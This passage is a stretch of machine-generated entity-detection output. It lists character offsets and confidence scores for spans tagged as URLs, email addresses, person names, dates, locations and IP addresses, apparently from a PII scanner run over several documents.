end: 24590, score: 0.5, type: URL, start: 24598, end: 24603, score: 0.5, type: URL, start: 26433, end: 26446, score: 0.5, type: URL, start: 26454, end: 26459, score: 0.5, type: URL, start: 27055, end: 27062, score: 0.5, type: URL, start: 27098, end: 27105, score: 0.5, type: URL, start: 27145, end: 27152, score: 0.5, type: URL, start: 27205, end: 27212, score: 0.5, type: URL, start: 27260, end: 27267, score: 0.5, type: URL, start: 27311, end: 27318, score: 0.5, type: URL, start: 27359, end: 27366, score: 0.5, type: URL, start: 27462, end: 27469, score: 0.5, type: URL, start: 27516, end: 27523, score: 0.5, type: URL, start: 27563, end: 27570, score: 0.5, type: URL, start: 27605, end: 27612, score: 0.5, type: URL, start: 27773, end: 27780, score: 0.5, type: URL, start: 27985, end: 27992, score: 0.5, type: URL, start: 28260, end: 28267, score: 0.5, type: URL, start: 28357, end: 28364, score: 0.5, type: URL, start: 28467, end: 28474, score: 0.5, type: URL, start: 28572, end: 28579, score: 0.5, type: URL, start: 28673, end: 28680, score: 0.5, type: URL, start: 28771, end: 28778, score: 0.5, type: URL, start: 28974, end: 28981, score: 0.5, type: URL, start: 29078, end: 29085, score: 0.5, type: URL, start: 29175, end: 29182, score: 0.5, type: URL, start: 29267, end: 29274, score: 0.5, type: URL, start: 29569, end: 29582, score: 0.5, type: URL, start: 29699, end: 29730, score: 0.5, type: URL, start: 30087, end: 30094, score: 0.5, type: URL, start: 30154, end: 30161, score: 0.5, type: URL, start: 30390, end: 30403, score: 0.5, type: URL, start: 30516, end: 30538, score: 0.5, type: URL, start: 30864, end: 30871, score: 0.5, type: URL, start: 30894, end: 30901, score: 0.5, type: URL, start: 31061, end: 31074, score: 0.5, type: URL, start: 31183, end: 31197, score: 0.5, type: URL, start: 31443, end: 31456, score: 0.5, type: URL, start: 31464, end: 31469, score: 0.5, type: URL, start: 31497, end: 31520, score: 0.5, type: URL, start: 31705, end: 31712, score: 0.5, type: URL, start: 31740, end: 31747, score: 0.5, type: URL, start: 31756, end: 31774, score: 0.5, type: URL, start: 31799, end: 31815, score: 0.5, type: URL, start: 32096, end: 32109, score: 0.5, type: URL, start: 32117, end: 32122, score: 0.5, type: URL, start: 32150, end: 32182, score: 0.5, type: URL, start: 32394, end: 32401, score: 0.5, type: URL, start: 32433, end: 32440, score: 0.5, type: URL, start: 32476, end: 32491, score: 0.5, type: URL, start: 32523, end: 32538, score: 0.5, type: URL, start: 33331, end: 33344, score: 0.5, type: URL, start: 33352, end: 33357, score: 0.5, type: URL, start: 35187, end: 35200, score: 0.5, type: URL, start: 35208, end: 35213, score: 0.5, type: URL, start: 35809, end: 35816, score: 0.5, type: URL, start: 35852, end: 35859, score: 0.5, type: URL, start: 35899, end: 35906, score: 0.5, type: URL, start: 35959, end: 35966, score: 0.5, type: URL, start: 36014, end: 36021, score: 0.5, type: URL, start: 36065, end: 36072, score: 0.5, type: URL, start: 36113, end: 36120, score: 0.5, type: URL, start: 36216, end: 36223, score: 0.5, type: URL, start: 36270, end: 36277, score: 0.5, type: URL, start: 36317, end: 36324, score: 0.5, type: URL, start: 36359, end: 36366, score: 0.5, type: URL, start: 36527, end: 36534, score: 0.5, type: URL, start: 36739, end: 36746, score: 0.5, type: URL, start: 37014, end: 37021, score: 0.5, type: URL, start: 37111, end: 37118, score: 0.5, type: URL, start: 37221, end: 37228, score: 0.5, type: URL, start: 37326, end: 37333, score: 0.5, type: URL, start: 37427, end: 37434, score: 0.5, 
type: URL, start: 37525, end: 37532, score: 0.5, type: URL, start: 37728, end: 37735, score: 0.5, type: URL, start: 37832, end: 37839, score: 0.5, type: URL, start: 37929, end: 37936, score: 0.5, type: URL, start: 38021, end: 38028, score: 0.5, type: URL, start: 38323, end: 38336, score: 0.5, type: URL, start: 38453, end: 38480, score: 0.5, type: URL, start: 38837, end: 38844, score: 0.5, type: URL, start: 38904, end: 38911, score: 0.5, type: URL, start: 39140, end: 39153, score: 0.5, type: URL, start: 39266, end: 39284, score: 0.5, type: URL, start: 39610, end: 39617, score: 0.5, type: URL, start: 39640, end: 39647, score: 0.5, type: URL, start: 39807, end: 39820, score: 0.5, type: URL, start: 39929, end: 39937, score: 0.5, type: URL, start: 40232, end: 40239, score: 0.5, type: URL, start: 40261, end: 40268, score: 0.5, type: URL, start: 40422, end: 40429, score: 0.5, type: URL, start: 40447, end: 40454, score: 0.5, type: URL, start: 40589, end: 40602, score: 0.5, type: URL, start: 40707, end: 40715, score: 0.5, type: URL, start: 41010, end: 41017, score: 0.5, type: URL, start: 41037, end: 41044, score: 0.5, type: URL, start: 41161, end: 41174, score: 0.5, type: EMAIL_ADDRESS, start: 31, end: 46, score: 1.0, type: EMAIL_ADDRESS, start: 64, end: 79, score: 1.0, type: EMAIL_ADDRESS, start: 1107, end: 1122, score: 1.0, type: PERSON, start: 17, end: 30, score: 0.85, type: DATE_TIME, start: 97, end: 112, score: 0.85, type: DATE_TIME, start: 144, end: 148, score: 0.85, type: PERSON, start: 149, end: 162, score: 0.85, type: URL, start: 936, end: 944, score: 0.85, type: PERSON, start: 1164, end: 1176, score: 0.85, type: URL, start: 37, end: 46, score: 0.5, type: URL, start: 70, end: 79, score: 0.5, type: URL, start: 210, end: 219, score: 0.5, type: URL, start: 338, end: 346, score: 0.5, type: URL, start: 439, end: 449, score: 0.5, type: URL, start: 545, end: 555, score: 0.5, type: URL, start: 648, end: 657, score: 0.5, type: URL, start: 769, end: 778, score: 0.5, type: URL, start: 872, end: 881, score: 0.5, type: URL, start: 961, end: 969, score: 0.5, type: URL, start: 1092, end: 1099, score: 0.5, type: URL, start: 1113, end: 1122, score: 0.5, type: URL, start: 1155, end: 1166, score: 0.5, type: URL, start: 1254, end: 1261, score: 0.5, type: URL, start: 1341, end: 1348, score: 0.5, type: EMAIL_ADDRESS, start: 142, end: 157, score: 1.0, type: DATE_TIME, start: 176, end: 180, score: 0.85, type: PERSON, start: 1724, end: 1736, score: 0.85, type: PERSON, start: 1860, end: 1885, score: 0.85, type: URL, start: 198, end: 227, score: 0.6, type: URL, start: 877, end: 905, score: 0.6, type: URL, start: 148, end: 157, score: 0.5, type: URL, start: 1127, end: 1139, score: 0.5, type: URL, start: 1227, end: 1236, score: 0.5, type: URL, start: 1307, end: 1316, score: 0.5, type: URL, start: 1561, end: 1570, score: 0.5, type: URL, start: 2168, end: 2177, score: 0.5, type: URL, start: 2354, end: 2363, score: 0.5, type: EMAIL_ADDRESS, start: 128, end: 143, score: 1.0, type: PERSON, start: 117, end: 127, score: 0.85, type: PERSON, start: 1392, end: 1427, score: 0.85, type: PERSON, start: 1571, end: 1606, score: 0.85, type: URL, start: 743, end: 772, score: 0.6, type: URL, start: 134, end: 143, score: 0.5, type: URL, start: 796, end: 821, score: 0.5, type: URL, start: 902, end: 912, score: 0.5, type: URL, start: 952, end: 962, score: 0.5, type: URL, start: 1026, end: 1034, score: 0.5, type: URL, start: 1069, end: 1077, score: 0.5, type: URL, start: 1226, end: 1239, score: 0.5, type: URL, start: 1288, end: 1297, 
score: 0.5, type: URL, start: 1353, end: 1366, score: 0.5, type: URL, start: 24119, end: 24179, score: 0.95, type: DATE_TIME, start: 51, end: 60, score: 0.85, type: LOCATION, start: 824, end: 833, score: 0.85, type: LOCATION, start: 835, end: 842, score: 0.85, type: URL, start: 965, end: 977, score: 0.85, type: PERSON, start: 1115, end: 1123, score: 0.85, type: PERSON, start: 1198, end: 1206, score: 0.85, type: PERSON, start: 1289, end: 1305, score: 0.85, type: URL, start: 1799, end: 1809, score: 0.85, type: URL, start: 1827, end: 1834, score: 0.85, type: URL, start: 1919, end: 1928, score: 0.85, type: URL, start: 2114, end: 2121, score: 0.85, type: URL, start: 2170, end: 2177, score: 0.85, type: PERSON, start: 2292, end: 2301, score: 0.85, type: URL, start: 2390, end: 2397, score: 0.85, type: URL, start: 2587, end: 2591, score: 0.85, type: PERSON, start: 3454, end: 3465, score: 0.85, type: PERSON, start: 3832, end: 3841, score: 0.85, type: PERSON, start: 4311, end: 4318, score: 0.85, type: PERSON, start: 4540, end: 4549, score: 0.85, type: LOCATION, start: 4669, end: 4691, score: 0.85, type: URL, start: 4738, end: 4745, score: 0.85, type: URL, start: 5064, end: 5071, score: 0.85, type: URL, start: 5120, end: 5127, score: 0.85, type: URL, start: 5145, end: 5159, score: 0.85, type: URL, start: 5428, end: 5438, score: 0.85, type: URL, start: 5455, end: 5462, score: 0.85, type: URL, start: 5645, end: 5649, score: 0.85, type: URL, start: 5729, end: 5739, score: 0.85, type: URL, start: 5756, end: 5763, score: 0.85, type: URL, start: 6387, end: 6397, score: 0.85, type: URL, start: 6414, end: 6421, score: 0.85, type: URL, start: 6942, end: 6946, score: 0.85, type: URL, start: 7036, end: 7051, score: 0.85, type: URL, start: 7087, end: 7094, score: 0.85, type: URL, start: 7134, end: 7141, score: 0.85, type: URL, start: 7358, end: 7362, score: 0.85, type: URL, start: 7452, end: 7467, score: 0.85, type: URL, start: 7503, end: 7510, score: 0.85, type: URL, start: 7550, end: 7557, score: 0.85, type: URL, start: 7792, end: 7796, score: 0.85, type: URL, start: 7886, end: 7901, score: 0.85, type: URL, start: 7937, end: 7944, score: 0.85, type: URL, start: 7984, end: 7991, score: 0.85, type: URL, start: 8231, end: 8235, score: 0.85, type: URL, start: 8325, end: 8340, score: 0.85, type: URL, start: 8376, end: 8383, score: 0.85, type: URL, start: 8423, end: 8430, score: 0.85, type: URL, start: 8463, end: 8474, score: 0.85, type: URL, start: 8666, end: 8670, score: 0.85, type: URL, start: 9516, end: 9531, score: 0.85, type: URL, start: 9564, end: 9571, score: 0.85, type: URL, start: 9621, end: 9628, score: 0.85, type: URL, start: 10047, end: 10062, score: 0.85, type: URL, start: 10095, end: 10102, score: 0.85, type: URL, start: 10152, end: 10159, score: 0.85, type: URL, start: 10551, end: 10561, score: 0.85, type: URL, start: 10579, end: 10586, score: 0.85, type: URL, start: 10604, end: 10613, score: 0.85, type: URL, start: 10674, end: 10684, score: 0.85, type: URL, start: 10809, end: 10820, score: 0.85, type: URL, start: 10893, end: 10903, score: 0.85, type: URL, start: 10921, end: 10928, score: 0.85, type: URL, start: 10998, end: 11008, score: 0.85, type: URL, start: 11026, end: 11033, score: 0.85, type: URL, start: 11051, end: 11060, score: 0.85, type: PERSON, start: 11109, end: 11116, score: 0.85, type: URL, start: 11159, end: 11166, score: 0.85, type: URL, start: 11231, end: 11241, score: 0.85, type: URL, start: 11400, end: 11404, score: 0.85, type: URL, start: 11480, end: 11490, score: 0.85, type: URL, 
start: 11507, end: 11514, score: 0.85, type: URL, start: 12112, end: 12122, score: 0.85, type: URL, start: 12151, end: 12156, score: 0.85, type: URL, start: 12381, end: 12391, score: 0.85, type: URL, start: 12408, end: 12415, score: 0.85, type: URL, start: 12866, end: 12870, score: 0.85, type: PERSON, start: 12921, end: 12926, score: 0.85, type: URL, start: 13056, end: 13061, score: 0.85, type: LOCATION, start: 13395, end: 13400, score: 0.85, type: LOCATION, start: 14172, end: 14177, score: 0.85, type: PERSON, start: 14462, end: 14469, score: 0.85, type: LOCATION, start: 15033, end: 15038, score: 0.85, type: PERSON, start: 15445, end: 15452, score: 0.85, type: LOCATION, start: 17097, end: 17102, score: 0.85, type: PERSON, start: 18820, end: 18824, score: 0.85, type: PERSON, start: 20198, end: 20205, score: 0.85, type: URL, start: 21663, end: 21673, score: 0.85, type: LOCATION, start: 21710, end: 21733, score: 0.85, type: URL, start: 21710, end: 21717, score: 0.85, type: URL, start: 21750, end: 21760, score: 0.85, type: URL, start: 21783, end: 21790, score: 0.85, type: URL, start: 21799, end: 21809, score: 0.85, type: URL, start: 22961, end: 22965, score: 0.85, type: URL, start: 23511, end: 23518, score: 0.85, type: URL, start: 23592, end: 23597, score: 0.85, type: URL, start: 23702, end: 23706, score: 0.85, type: URL, start: 23760, end: 23767, score: 0.85, type: PERSON, start: 23789, end: 23794, score: 0.85, type: URL, start: 23821, end: 23826, score: 0.85, type: LOCATION, start: 23974, end: 24004, score: 0.85, type: URL, start: 24227, end: 24234, score: 0.85, type: PERSON, start: 24256, end: 24261, score: 0.85, type: URL, start: 24275, end: 24282, score: 0.85, type: NRP, start: 24320, end: 24327, score: 0.85, type: LOCATION, start: 24408, end: 24436, score: 0.85, type: NRP, start: 24541, end: 24548, score: 0.85, type: LOCATION, start: 24608, end: 24636, score: 0.85, type: URL, start: 24836, end: 24846, score: 0.85, type: URL, start: 24864, end: 24871, score: 0.85, type: URL, start: 24893, end: 24902, score: 0.85, type: PERSON, start: 24951, end: 24958, score: 0.85, type: URL, start: 25225, end: 25229, score: 0.85, type: URL, start: 25293, end: 25300, score: 0.85, type: URL, start: 25467, end: 25471, score: 0.85, type: URL, start: 25742, end: 25746, score: 0.85, type: DATE_TIME, start: 26903, end: 26945, score: 0.85, type: URL, start: 27485, end: 27493, score: 0.85, type: URL, start: 27510, end: 27517, score: 0.85, type: URL, start: 27668, end: 27672, score: 0.85, type: URL, start: 27701, end: 27706, score: 0.85, type: URL, start: 27870, end: 27878, score: 0.85, type: URL, start: 27903, end: 27910, score: 0.85, type: URL, start: 28157, end: 28164, score: 0.85, type: URL, start: 28315, end: 28319, score: 0.85, type: URL, start: 28340, end: 28347, score: 0.85, type: URL, start: 28746, end: 28753, score: 0.85, type: URL, start: 28933, end: 28937, score: 0.85, type: URL, start: 28958, end: 28965, score: 0.85, type: URL, start: 29095, end: 29100, score: 0.85, type: URL, start: 29137, end: 29141, score: 0.85, type: URL, start: 29162, end: 29169, score: 0.85, type: URL, start: 29343, end: 29347, score: 0.85, type: URL, start: 29368, end: 29375, score: 0.85, type: URL, start: 29542, end: 29546, score: 0.85, type: URL, start: 29567, end: 29574, score: 0.85, type: URL, start: 29822, end: 29826, score: 0.85, type: URL, start: 29899, end: 29904, score: 0.85, type: URL, start: 30026, end: 30030, score: 0.85, type: URL, start: 30164, end: 30169, score: 0.85, type: PERSON, start: 30182, end: 30236, 
score: 0.85, type: URL, start: 30574, end: 30584, score: 0.85, type: URL, start: 30986, end: 30990, score: 0.85, type: URL, start: 31617, end: 31621, score: 0.85, type: URL, start: 31638, end: 31651, score: 0.85, type: URL, start: 31773, end: 31778, score: 0.85, type: URL, start: 31826, end: 31831, score: 0.85, type: URL, start: 31877, end: 31881, score: 0.85, type: URL, start: 31964, end: 31980, score: 0.85, type: URL, start: 32102, end: 32107, score: 0.85, type: URL, start: 32163, end: 32168, score: 0.85, type: URL, start: 32214, end: 32218, score: 0.85, type: URL, start: 32236, end: 32246, score: 0.85, type: URL, start: 32368, end: 32373, score: 0.85, type: URL, start: 32432, end: 32437, score: 0.85, type: URL, start: 32483, end: 32487, score: 0.85, type: URL, start: 32505, end: 32516, score: 0.85, type: URL, start: 32638, end: 32643, score: 0.85, type: LOCATION, start: 32665, end: 32673, score: 0.85, type: URL, start: 32692, end: 32697, score: 0.85, type: URL, start: 32743, end: 32747, score: 0.85, type: URL, start: 32765, end: 32776, score: 0.85, type: URL, start: 32898, end: 32903, score: 0.85, type: URL, start: 32956, end: 32961, score: 0.85, type: URL, start: 33007, end: 33011, score: 0.85, type: URL, start: 33064, end: 33071, score: 0.85, type: URL, start: 33130, end: 33136, score: 0.85, type: URL, start: 33203, end: 33213, score: 0.85, type: URL, start: 691, end: 719, score: 0.6, type: IP_ADDRESS, start: 27845, end: 27856, score: 0.6, type: IP_ADDRESS, start: 28099, end: 28111, score: 0.6, type: URL, start: 890, end: 905, score: 0.5, type: URL, start: 1069, end: 1077, score: 0.5, type: URL, start: 1152, end: 1160, score: 0.5, type: URL, start: 1235, end: 1250, score: 0.5, type: URL, start: 1955, end: 1962, score: 0.5, type: URL, start: 1985, end: 1992, score: 0.5, type: URL, start: 2001, end: 2015, score: 0.5, type: URL, start: 2030, end: 2037, score: 0.5, type: URL, start: 2045, end: 2056, score: 0.5, type: URL, start: 2083, end: 2090, score: 0.5, type: URL, start: 2292, end: 2299, score: 0.5, type: URL, start: 2668, end: 2676, score: 0.5, type: URL, start: 2701, end: 2709, score: 0.5, type: URL, start: 2807, end: 2818, score: 0.5, type: URL, start: 2831, end: 2842, score: 0.5, type: URL, start: 2929, end: 2934, score: 0.5, type: URL, start: 2999, end: 3004, score: 0.5, type: URL, start: 3094, end: 3099, score: 0.5, type: URL, start: 3160, end: 3165, score: 0.5, type: URL, start: 3271, end: 3279, score: 0.5, type: URL, start: 3304, end: 3312, score: 0.5, type: URL, start: 3417, end: 3424, score: 0.5, type: URL, start: 3454, end: 3459, score: 0.5, type: URL, start: 3528, end: 3533, score: 0.5, type: URL, start: 3581, end: 3585, score: 0.5, type: URL, start: 3653, end: 3660, score: 0.5, type: URL, start: 3739, end: 3746, score: 0.5, type: URL, start: 4008, end: 4015, score: 0.5, type: URL, start: 4027, end: 4034, score: 0.5, type: URL, start: 4099, end: 4106, score: 0.5, type: URL, start: 4150, end: 4157, score: 0.5, type: URL, start: 4171, end: 4178, score: 0.5, type: URL, start: 4191, end: 4198, score: 0.5, type: URL, start: 4221, end: 4228, score: 0.5, type: URL, start: 4240, end: 4247, score: 0.5, type: URL, start: 4293, end: 4300, score: 0.5, type: URL, start: 4364, end: 4371, score: 0.5, type: URL, start: 4385, end: 4392, score: 0.5, type: URL, start: 4405, end: 4412, score: 0.5, type: URL, start: 4471, end: 4478, score: 0.5, type: URL, start: 5033, end: 5040, score: 0.5, type: URL, start: 5164, end: 5171, score: 0.5, type: URL, start: 5662, end: 5666, score: 0.5, type: URL, 
start: 6061, end: 6072, score: 0.5, type: URL, start: 6089, end: 6100, score: 0.5, type: URL, start: 6128, end: 6133, score: 0.5, type: URL, start: 6262, end: 6267, score: 0.5, type: URL, start: 6324, end: 6328, score: 0.5, type: URL, start: 6646, end: 6657, score: 0.5, type: URL, start: 6678, end: 6689, score: 0.5, type: URL, start: 6782, end: 6787, score: 0.5, type: URL, start: 6892, end: 6897, score: 0.5, type: URL, start: 7179, end: 7184, score: 0.5, type: URL, start: 7315, end: 7320, score: 0.5, type: URL, start: 7632, end: 7637, score: 0.5, type: URL, start: 7749, end: 7754, score: 0.5, type: URL, start: 8065, end: 8070, score: 0.5, type: URL, start: 8188, end: 8193, score: 0.5, type: URL, start: 8479, end: 8486, score: 0.5, type: URL, start: 8517, end: 8522, score: 0.5, type: URL, start: 8619, end: 8624, score: 0.5, type: URL, start: 8963, end: 8968, score: 0.5, type: URL, start: 9084, end: 9089, score: 0.5, type: URL, start: 9191, end: 9196, score: 0.5, type: URL, start: 9246, end: 9250, score: 0.5, type: URL, start: 9343, end: 9348, score: 0.5, type: URL, start: 9697, end: 9702, score: 0.5, type: URL, start: 9810, end: 9815, score: 0.5, type: URL, start: 9864, end: 9868, score: 0.5, type: URL, start: 10642, end: 10649, score: 0.5, type: URL, start: 11089, end: 11096, score: 0.5, type: URL, start: 11180, end: 11187, score: 0.5, type: URL, start: 11200, end: 11207, score: 0.5, type: URL, start: 11417, end: 11421, score: 0.5, type: URL, start: 11806, end: 11817, score: 0.5, type: URL, start: 11830, end: 11841, score: 0.5, type: URL, start: 11865, end: 11870, score: 0.5, type: URL, start: 11944, end: 11949, score: 0.5, type: URL, start: 11989, end: 11993, score: 0.5, type: URL, start: 12256, end: 12261, score: 0.5, type: URL, start: 12318, end: 12322, score: 0.5, type: URL, start: 12648, end: 12659, score: 0.5, type: URL, start: 12680, end: 12691, score: 0.5, type: URL, start: 12710, end: 12717, score: 0.5, type: URL, start: 12726, end: 12734, score: 0.5, type: URL, start: 12758, end: 12763, score: 0.5, type: URL, start: 12815, end: 12820, score: 0.5, type: URL, start: 13354, end: 13359, score: 0.5, type: URL, start: 13411, end: 13415, score: 0.5, type: URL, start: 13706, end: 13711, score: 0.5, type: URL, start: 14131, end: 14136, score: 0.5, type: URL, start: 14200, end: 14204, score: 0.5, type: URL, start: 14514, end: 14519, score: 0.5, type: URL, start: 14992, end: 14997, score: 0.5, type: URL, start: 15066, end: 15070, score: 0.5, type: URL, start: 15497, end: 15502, score: 0.5, type: URL, start: 15743, end: 15748, score: 0.5, type: URL, start: 15791, end: 15795, score: 0.5, type: URL, start: 16039, end: 16044, score: 0.5, type: URL, start: 16338, end: 16343, score: 0.5, type: URL, start: 16391, end: 16395, score: 0.5, type: URL, start: 16671, end: 16676, score: 0.5, type: URL, start: 17048, end: 17053, score: 0.5, type: URL, start: 17113, end: 17117, score: 0.5, type: URL, start: 17491, end: 17496, score: 0.5, type: URL, start: 17582, end: 17587, score: 0.5, type: URL, start: 17622, end: 17626, score: 0.5, type: URL, start: 17720, end: 17725, score: 0.5, type: URL, start: 17811, end: 17816, score: 0.5, type: URL, start: 17851, end: 17855, score: 0.5, type: URL, start: 17942, end: 17947, score: 0.5, type: URL, start: 18033, end: 18038, score: 0.5, type: URL, start: 18073, end: 18077, score: 0.5, type: URL, start: 18167, end: 18172, score: 0.5, type: URL, start: 18258, end: 18263, score: 0.5, type: URL, start: 18298, end: 18302, score: 0.5, type: URL, start: 18394, end: 18399, 
score: 0.5, type: URL, start: 18485, end: 18490, score: 0.5, type: URL, start: 18525, end: 18529, score: 0.5, type: URL, start: 18619, end: 18624, score: 0.5, type: URL, start: 18710, end: 18715, score: 0.5, type: URL, start: 18750, end: 18754, score: 0.5, type: URL, start: 18843, end: 18848, score: 0.5, type: URL, start: 18934, end: 18939, score: 0.5, type: URL, start: 18974, end: 18978, score: 0.5, type: URL, start: 19074, end: 19079, score: 0.5, type: URL, start: 19165, end: 19170, score: 0.5, type: URL, start: 19205, end: 19209, score: 0.5, type: URL, start: 19308, end: 19313, score: 0.5, type: URL, start: 19399, end: 19404, score: 0.5, type: URL, start: 19439, end: 19443, score: 0.5, type: URL, start: 19532, end: 19537, score: 0.5, type: URL, start: 19623, end: 19628, score: 0.5, type: URL, start: 19663, end: 19667, score: 0.5, type: URL, start: 19763, end: 19768, score: 0.5, type: URL, start: 19854, end: 19859, score: 0.5, type: URL, start: 19894, end: 19898, score: 0.5, type: URL, start: 19997, end: 20002, score: 0.5, type: URL, start: 20088, end: 20093, score: 0.5, type: URL, start: 20128, end: 20132, score: 0.5, type: URL, start: 20224, end: 20229, score: 0.5, type: URL, start: 20333, end: 20338, score: 0.5, type: URL, start: 20373, end: 20377, score: 0.5, type: URL, start: 20465, end: 20470, score: 0.5, type: URL, start: 20541, end: 20546, score: 0.5, type: URL, start: 20581, end: 20585, score: 0.5, type: URL, start: 20676, end: 20681, score: 0.5, type: URL, start: 20752, end: 20757, score: 0.5, type: URL, start: 20792, end: 20796, score: 0.5, type: URL, start: 20892, end: 20897, score: 0.5, type: URL, start: 21264, end: 21269, score: 0.5, type: URL, start: 21325, end: 21329, score: 0.5, type: URL, start: 21877, end: 21884, score: 0.5, type: URL, start: 21893, end: 21905, score: 0.5, type: URL, start: 21966, end: 21980, score: 0.5, type: URL, start: 21985, end: 21992, score: 0.5, type: URL, start: 22030, end: 22038, score: 0.5, type: URL, start: 22063, end: 22071, score: 0.5, type: URL, start: 22118, end: 22125, score: 0.5, type: URL, start: 22161, end: 22168, score: 0.5, type: URL, start: 22177, end: 22187, score: 0.5, type: URL, start: 22222, end: 22230, score: 0.5, type: URL, start: 22255, end: 22263, score: 0.5, type: URL, start: 22310, end: 22317, score: 0.5, type: URL, start: 22353, end: 22360, score: 0.5, type: URL, start: 22369, end: 22377, score: 0.5, type: URL, start: 22412, end: 22420, score: 0.5, type: URL, start: 22445, end: 22453, score: 0.5, type: URL, start: 22499, end: 22506, score: 0.5, type: URL, start: 22541, end: 22548, score: 0.5, type: URL, start: 22557, end: 22570, score: 0.5, type: URL, start: 22605, end: 22613, score: 0.5, type: URL, start: 22638, end: 22646, score: 0.5, type: URL, start: 22692, end: 22699, score: 0.5, type: URL, start: 22736, end: 22743, score: 0.5, type: URL, start: 22752, end: 22761, score: 0.5, type: URL, start: 22978, end: 22982, score: 0.5, type: URL, start: 23392, end: 23403, score: 0.5, type: URL, start: 23465, end: 23476, score: 0.5, type: URL, start: 23647, end: 23652, score: 0.5, type: URL, start: 23883, end: 23888, score: 0.5, type: URL, start: 23938, end: 23942, score: 0.5, type: URL, start: 23974, end: 23979, score: 0.5, type: URL, start: 24022, end: 24027, score: 0.5, type: URL, start: 24075, end: 24079, score: 0.5, type: URL, start: 24291, end: 24304, score: 0.5, type: URL, start: 24408, end: 24413, score: 0.5, type: URL, start: 24471, end: 24476, score: 0.5, type: URL, start: 24514, end: 24518, score: 0.5, type: URL, 
start: 24608, end: 24613, score: 0.5, type: URL, start: 24671, end: 24676, score: 0.5, type: URL, start: 24714, end: 24718, score: 0.5, type: URL, start: 24766, end: 24773, score: 0.5, type: URL, start: 24931, end: 24938, score: 0.5, type: URL, start: 25038, end: 25045, score: 0.5, type: URL, start: 25054, end: 25065, score: 0.5, type: URL, start: 25090, end: 25095, score: 0.5, type: URL, start: 25183, end: 25188, score: 0.5, type: URL, start: 25309, end: 25317, score: 0.5, type: URL, start: 25342, end: 25347, score: 0.5, type: URL, start: 25425, end: 25430, score: 0.5, type: URL, start: 25759, end: 25763, score: 0.5, type: URL, start: 26156, end: 26167, score: 0.5, type: URL, start: 26180, end: 26191, score: 0.5, type: URL, start: 26229, end: 26234, score: 0.5, type: URL, start: 26528, end: 26533, score: 0.5, type: URL, start: 26581, end: 26585, score: 0.5, type: URL, start: 26903, end: 26908, score: 0.5, type: URL, start: 26964, end: 26969, score: 0.5, type: URL, start: 27005, end: 27009, score: 0.5, type: URL, start: 27051, end: 27058, score: 0.5, type: URL, start: 27067, end: 27077, score: 0.5, type: URL, start: 27135, end: 27140, score: 0.5, type: URL, start: 27215, end: 27220, score: 0.5, type: URL, start: 27270, end: 27274, score: 0.5, type: URL, start: 27303, end: 27308, score: 0.5, type: URL, start: 27351, end: 27356, score: 0.5, type: URL, start: 27400, end: 27404, score: 0.5, type: URL, start: 27526, end: 27539, score: 0.5, type: URL, start: 27563, end: 27568, score: 0.5, type: URL, start: 27617, end: 27622, score: 0.5, type: URL, start: 27749, end: 27754, score: 0.5, type: URL, start: 27798, end: 27802, score: 0.5, type: URL, start: 27919, end: 27931, score: 0.5, type: URL, start: 27955, end: 27960, score: 0.5, type: URL, start: 28003, end: 28008, score: 0.5, type: URL, start: 28052, end: 28056, score: 0.5, type: URL, start: 28173, end: 28186, score: 0.5, type: URL, start: 28210, end: 28215, score: 0.5, type: URL, start: 28264, end: 28269, score: 0.5, type: URL, start: 28356, end: 28367, score: 0.5, type: URL, start: 28392, end: 28397, score: 0.5, type: URL, start: 28476, end: 28481, score: 0.5, type: URL, start: 28511, end: 28515, score: 0.5, type: URL, start: 28544, end: 28549, score: 0.5, type: URL, start: 28619, end: 28624, score: 0.5, type: URL, start: 28658, end: 28662, score: 0.5, type: URL, start: 28762, end: 28773, score: 0.5, type: URL, start: 28798, end: 28803, score: 0.5, type: URL, start: 28891, end: 28896, score: 0.5, type: URL, start: 28974, end: 28982, score: 0.5, type: URL, start: 29007, end: 29012, score: 0.5, type: URL, start: 29178, end: 29193, score: 0.5, type: URL, start: 29218, end: 29223, score: 0.5, type: URL, start: 29301, end: 29306, score: 0.5, type: URL, start: 29384, end: 29395, score: 0.5, type: URL, start: 29420, end: 29425, score: 0.5, type: URL, start: 29500, end: 29505, score: 0.5, type: URL, start: 29583, end: 29594, score: 0.5, type: URL, start: 29599, end: 29606, score: 0.5, type: URL, start: 29615, end: 29629, score: 0.5, type: URL, start: 29654, end: 29659, score: 0.5, type: URL, start: 29780, end: 29785, score: 0.5, type: URL, start: 29984, end: 29989, score: 0.5, type: URL, start: 30253, end: 30258, score: 0.5, type: URL, start: 30294, end: 30298, score: 0.5, type: URL, start: 30327, end: 30332, score: 0.5, type: URL, start: 30395, end: 30400, score: 0.5, type: URL, start: 30434, end: 30438, score: 0.5, type: URL, start: 30481, end: 30489, score: 0.5, type: URL, start: 30660, end: 30668, score: 0.5, type: URL, start: 30693, end: 30701, 
score: 0.5, type: URL, start: 30758, end: 30765, score: 0.5, type: URL, start: 31003, end: 31007, score: 0.5, type: URL, start: 31408, end: 31419, score: 0.5, type: URL, start: 31436, end: 31447, score: 0.5, type: URL, start: 31475, end: 31480, score: 0.5, type: URL, start: 31564, end: 31569, score: 0.5, type: URL, start: 33307, end: 33318, score: 0.5, type: URL, start: 33322, end: 33333, score: 0.5, type: URL, start: 33336, end: 33347, score: 0.5, type: URL, start: 33507, end: 33521, score: 0.5, type: PERSON, start: 196, end: 208, score: 0.85, type: PERSON, start: 9026, end: 9042, score: 0.85, type: DATE_TIME, start: 13156, end: 13160, score: 0.85, type: PERSON, start: 17255, end: 17271, score: 0.85, type: LOCATION, start: 17308, end: 17320, score: 0.85, type: PERSON, start: 17980, end: 18015, score: 0.85, type: PERSON, start: 19410, end: 19426, score: 0.85, type: PERSON, start: 21452, end: 21461, score: 0.85, type: PERSON, start: 21568, end: 21590, score: 0.85, type: PERSON, start: 22691, end: 22707, score: 0.85, type: PERSON, start: 23569, end: 23600, score: 0.85, type: PERSON, start: 23699, end: 23706, score: 0.85, type: PERSON, start: 23791, end: 23798, score: 0.85, type: PERSON, start: 23917, end: 23945, score: 0.85, type: PERSON, start: 25160, end: 25177, score: 0.85, type: LOCATION, start: 30452, end: 30461, score: 0.85, type: LOCATION, start: 35851, end: 35857, score: 0.85, type: DATE_TIME, start: 35907, end: 35913, score: 0.85, type: LOCATION, start: 39538, end: 39542, score: 0.85, type: LOCATION, start: 40015, end: 40024, score: 0.85, type: PERSON, start: 41500, end: 41517, score: 0.85, type: LOCATION, start: 46777, end: 46786, score: 0.85, type: NRP, start: 48562, end: 48573, score: 0.85, type: PERSON, start: 48980, end: 49011, score: 0.85, type: PERSON, start: 49110, end: 49117, score: 0.85, type: PERSON, start: 49198, end: 49205, score: 0.85, type: PERSON, start: 49324, end: 